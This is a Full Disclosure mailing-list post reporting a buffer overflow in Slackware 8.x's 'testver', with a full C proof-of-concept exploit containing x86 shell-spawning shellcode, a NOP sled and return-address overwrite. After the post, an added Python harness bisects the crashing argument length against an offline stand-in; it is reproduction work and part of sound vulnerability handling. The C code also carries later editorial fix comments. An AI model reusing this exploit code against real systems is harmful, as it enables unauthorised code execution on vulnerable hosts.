Full Disclosure mailing list archives

buffer overflow in "testver" on Slackware NOT SETUID ROOT


From: Day Jay <d4yj4y () yahoo com>
Date: Wed, 20 Nov 2002 22:18:02 -0800 (PST)

Chung's Donut Shop Release
==========================
www.vapid.org/dorian/chungs
For Linux Slackware 8.x

There's a buffer overflow in "testver" on Slackware
8.x. If you pass an argument to testver longer than
4074 bytes it segfaults. Oops. That's plenty of room
to insert shellcode. testver is NOT setuid root. If it
was, the attached proof of concept code would give you
a root shell. Since it's not, the attached code gives
you a normal shell.

This issue was found by d4y-j4y and the attached
proof of lamerness was written by d4y-j4y.
d4yj4y () yahoo com

Regards,
d4y-j4y


/*
         Chung's Donut Shop Release
         ==========================
         www.vapid.org/dorian/chungs
         For Linux Slackware 8.x
         There's a buffer overflow in "testver"!!
         If you pass an argument to testver longer than 4074 bytes
         It segfaults. Oops. That's plenty of room to insert shellcode.

         This issue was found by d4y-j4y and this exploit was written
         by d4y-j4y. d4yj4y () yahoo com

         usage:
         $ gcc testver_smash.c -o testver_smash
         $ ./testver_smash
         $
         Not setuid though!!!  ARgh!!
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* memset, memcpy, strlen were used without this include */
#include <unistd.h>

#define BUFFER                         4075
#define OVERSIZE                       8

// Ya, you know the shellcode that gives you a shell
char shellcode[] =
   "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
   "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
   "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
   "\x80\xe8\xdc\xff\xff\xff/bin/sh";

/* Current stack pointer (32-bit x86 only, like the shellcode above).
   Uses an output operand and an explicit return instead of relying on
   %eax happening to hold the value when the function falls off the end. */
unsigned long get_sp (void)
{
         unsigned long sp;
         __asm__("movl %%esp, %0" : "=r"(sp));
         return sp;
}

int main ()
{
         char buffer [BUFFER+OVERSIZE+1];
         unsigned long sp;
         long addy;
         int offset = 300;   /* was assigned 8 and then overwritten with 300 */
         int i;

         sp = get_sp ();
         addy = sp - offset;

         /* bytes past the 4075-byte buffer are filled with the guessed address */
         for( i=BUFFER; i< BUFFER+OVERSIZE; i+=4)
             *(long*)&buffer[i] = addy;

         /* NOP sled first, shellcode at the end of the buffer, then terminate */
         memset (buffer, 0x90, BUFFER-strlen(shellcode));
         memcpy (buffer + BUFFER - strlen (shellcode), shellcode,strlen(shellcode));
         buffer[BUFFER+OVERSIZE] = '\0';
         printf ("Chung's Donut Shop\ntestver smash by d4y-j4y...\n");
         sleep(3);
         execl ("/usr/sbin/testver", "buffer", buffer, (char *) NULL);

         return 0;
}

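Before patching a report like this, a maintainer wants to reproduce the crash and pin down the length at which it starts. The harness below is an added example, not part of the original post or of Slackware: it bisects the smallest argument length that makes a program die from SIGSEGV. The sh one-liner standing in for testver is constructed so the code runs offline; the real binary path (`/usr/sbin/testver` in the post) is what you would pass as `cmd` on an affected host.

```python
import signal
import subprocess

# subprocess reports a child killed by a signal as a negative return code
SIGSEGV_RC = -int(signal.SIGSEGV)


def crashes_with_length(cmd, length, timeout=10):
    """Run cmd with one extra argument of `length` bytes.

    Returns True only if the child died from SIGSEGV, the symptom the
    post reports for over-long arguments to testver.
    """
    arg = "A" * length
    try:
        proc = subprocess.run(list(cmd) + [arg], stdout=subprocess.DEVNULL,
                              stderr=subprocess.DEVNULL, timeout=timeout)
    except subprocess.TimeoutExpired:
        return False  # a hang is a different bug; do not count it as the crash
    return proc.returncode == SIGSEGV_RC


def find_crash_threshold(cmd, lo=1, hi=65536):
    """Bisect the smallest argument length in [lo, hi] that makes cmd segfault.

    Assumes crashing is monotonic in length, which holds for a plain
    overrun of a fixed-size stack buffer. Returns None if even `hi` survives.
    """
    if not crashes_with_length(cmd, hi):
        return None
    if crashes_with_length(cmd, lo):
        return lo
    while hi - lo > 1:          # invariant: lo survives, hi crashes
        mid = (lo + hi) // 2
        if crashes_with_length(cmd, mid):
            hi = mid
        else:
            lo = mid
    return hi


# Constructed stand-in for testver so the harness runs offline: a shell
# one-liner that raises SIGSEGV on itself whenever its argument exceeds
# 4074 bytes, the limit reported in the post. On a real host replace it
# with the binary under test, e.g. ["/usr/sbin/testver"].
FAKE_TESTVER = ["sh", "-c", 'if [ ${#1} -gt 4074 ]; then kill -s SEGV $$; fi',
                "fake-testver"]

if __name__ == "__main__":
    print("smallest crashing length:", find_crash_threshold(FAKE_TESTVER, 1, 8192))
```

The threshold the bisection returns is the first length that crashes, so a reported "longer than 4074 bytes" shows up here as 4075.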